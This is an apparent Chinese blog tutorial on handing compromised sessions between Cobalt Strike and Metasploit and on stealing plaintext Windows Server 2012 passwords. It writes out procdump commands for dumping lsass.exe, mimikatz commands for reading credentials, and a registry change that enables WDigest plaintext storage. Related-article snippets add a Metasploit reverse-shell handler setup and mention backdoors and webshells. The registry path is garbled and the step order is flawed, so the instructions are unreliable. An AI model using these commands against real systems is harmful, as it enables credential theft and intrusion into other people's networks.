cs与msf权限传递,以及mimikatz抓取win2012明文密码

最新推荐文章于 2024-08-03 12:29:41 发布
最新推荐文章于 2024-08-03 12:29:41 发布
阅读量175 收藏 5
点赞数 8
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64981741/article/details/139987770
版权
cs与msf权限传递

CS与MSF之间的权限传递通常可以通过设置监听器和生成木马文件来实现。CS可以生成一个外部的监听器,并将其地址和端口设置为MSF的监听配置来相匹配。这样,当受感染的主机上线时,MSF便可以接收并控制该会话。同样,MSF也可以将权限传递回CS,通过使用MSF生成木马并进行相应的监听设置,之后在CS中选择对应的外部监听器来完成权限传递。

利用mimikatz来抓取win2012明文密码:
1.导出 lsass.dmp:通过使用procdump64.exe工具导出lsass.exe进程的内存文件,命令如下:procdump64.exe -accepteula -ma lsass.exe lsass.dmp。之后的Mimikatz需要从这个内存文件中读取密码信息。

2.下载并运行 Mimikatz:从官方网站或GitHub仓库下载对应版本的Mimikatz,对于不同系统架构需要选择相应版本。下载安装完成后运行Mimikatz,并通过以下命令提升权限和抓取密码:

提升权限:privilege::debug
 
抓取密码:sekurlsa::logonpasswords
3.修改注册表:由于Win2012系统的默认设置可能不在内存中保留密码明文,因此需要修改注册表来更改这一行为。执行以下命令:

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
这一操作可以让系统在用户登录时保存明文密码。

4.读取明文密码:完成上述步骤后,再次使用Mimikatz读取lsass.dmp文件。此时应该能看到密码字段已显示为明文。如果没有看到明文,可能需要检查以上步骤是否正确执行或是否存在其他安全机制阻止了这一过程。

小张太子zhang
关注
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4393
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
vulstack2(hydra爆mssql、免杀360、csmsf渗透、weblogic、computer brower服务支持6118,域管密码过期kerberos认证错误导致部分域服务不可用)
qq_45290991的博客
09-24 1768
很久之前打了第一个靶场,但是打的不全,不舒坦,不够彻底,由于一直报rpc连接失败所以有的步骤不顺,这次学了一点小小的免杀技巧,过来带着练习的心态学学这个靶场。 0、环境搭建(难点) 环境搭建参考:漏洞详情 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 红日靶场二 WalkThrough – Crispr –热爱技术和生活 记得要在web机子里面手动开启服务,在 C:\Oracle\Middleware\user_projects\doma
csmsf联动概述
weixin_43873557的博客
02-08 2433
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。 获得beacon shell,启动socks shell ipconfig 目标机器在24.*网段,仅一个网段 思路:利用 beacon shell 在目标机器和团队服 务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。 查看团队服务器 socks 端口启起来了没有:netst
csmsf权限传递mimikatz抓取win2012明文密码
qq_64951792的博客
06-27 690
cobaltstrike,msf
课堂笔记——csmsf权限传递,以及mimikatz抓取win2012明文密码
qq_64338246的博客
06-26 375
CS(Cobalt Strike)和MSF(Metasploit Framework)是两个广泛使用的渗透测试工具,它们可以相互配合,实现权限传递,扩大攻击范围。Cobalt Strike采用客户端/服务端架构,允许多人进行团队协作,特别适合模拟高级持续性威胁(APT)攻击。它集成了多种功能,包括端口转发、服务扫描、自动化溢出、多模式端口监听、Windows可执行文件(exe)木马生成、动态链接库(dll)生成、Java木马生成、Office宏病毒生成、木马捆绑;钓鱼攻击等。
CS + MSF 联动
A_dmin的博客
12-23 1611
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听(ps:这里手抖少打了一个7) 如果msf处于公网,cs添加监听器Listener,HOST和PORT填写msf监听的地址IP:xxxx,PORT:7777
msfcs联动
qq_63501912的博客
02-06 955
msfcs之间的会话传递
win10及win2012之后系统的明文抓取方式
聚鼎安全
03-29 3586
原文地址:https://www.anquanke.com/post/id/175364 抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码 1.procdump+mimikatz获取win10/win2012 R2用户明文密码 测试环境:win10企业版和win2012 R2 版本 工具下载:链接:https://pan.baidu.c...
内网渗透Windows密码凭证获取
qq_46258964的博客
06-09 2782
记录一下抓取window凭证信息的一些工具 Windows凭证抓取1,procdump (官方工具无视免杀)(首选) procdump + mimikatz 加载dmp文件,并导出其明文密码(procdump过杀软) 2,注册表读取windows hash (首选) 当目标为win10或2012R2以上时,默认在内存缓存禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 注册表读取密码主要获取的是3个文件 3,Pwdump 4,mimikatz(名声最大的密码获取工具) 5,MSF MSF框架密
红队攻防之从边界突破到漫游内网(无csmsf)
HBohan的博客
12-03 1915
前言 网络安全的本质:懂进攻,知防守,先正向,后逆向。 本篇文章目录 网络拓扑图: 本次红队攻防实战所需绘制的拓扑图如下: 边界突破 访问网站: http://xxx.xxx.xxx/?id=1 首页如下: SQL注入拿shell 构造payload:and 1=1显示正确,and 1=2显示错误,说明存在SQL注入,并且爆出绝对路径 使用常用的注入函数into outfile 将一句话木马写入自动创建的 xxx.php文件 http://xxx.xxx.xxx/?id=1 and 1=2 un
MSFCS联动
GoDunTong's Blog
04-08 4221
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 1817
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
记录一次学习过程(msfcs的使用、横向渗透等等)
最新发布
banliyaoguai的博客
08-03 847
在内网攻击不出王的机子,比如说现在攻击者入侵了一个公司的DMZ,公司的DMZ上有两张网卡一张对外网,一张对内网,内网不出网,这样你即便将木马发送给了内网机器内网机器也无法反弹。这种情况就可以使用这个代理,在DMZ上设置了代理后,攻击者直接登陆DMZ,DMZ是可以访问内网的,然后攻击这个就可以访问内网了。切换的时候shell容易掉。TCP和SMB可以用于内网横向渗透,内网有两台机器,两台机器账号密码相同,就可以用这个直接上线,就相当于SMB是一个共享服务,机器通过SMB通道将木马共享。
csmsf权限传递以及mimikatz抓取win2012明文密码
huizhaohaha的博客
05-25 832
我查找过资料得出,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework。
内网-域横向CS&MSF联动及应急响应初识
mingyqf的博客
11-24 998
内网-域横向CS&MSF联动及应急响应初识 本课重点: 案例1:MSF&CobaltStrike联动Shell 案例2:WEB攻击应急响应朔源-后门,日志 案例3:WIN系统攻击应急响应朔源-后门,日志,流量 案例1:MSF&CobaltStrike联动Shell 为什么要进行联动?因为csmsf经常相互调用,有一些功能cs强一点,有一些可能msf强一点,所以在渗透测试的时候经常要切换!所以我们需要学习如何在csmsf、powershell之间进行会话委派。powersh
内网安全之:Windows 密码抓取
f_carey的博客
11-14 4062
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记的技术进行违法活动,利用笔记的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 密码抓取 1 mimikatz 抓取密码 注:在 Windows 系统抓取 NTLM Hash 值或明文密码,必须将权限提升到 System;lsass.exe 进程用于实现 Windows 的安全策略。 利用通过 SAM 和 System 文件获得 NTLM Hash gentilkiw.
内网MSF基础:PostgreSQL配置与权限管理教程
本篇文章主要介绍了在内网环境使用Metasploit Framework (MSF)进行基础操作和配置的过程。MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境设置和管理PostgreSQL数据库,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值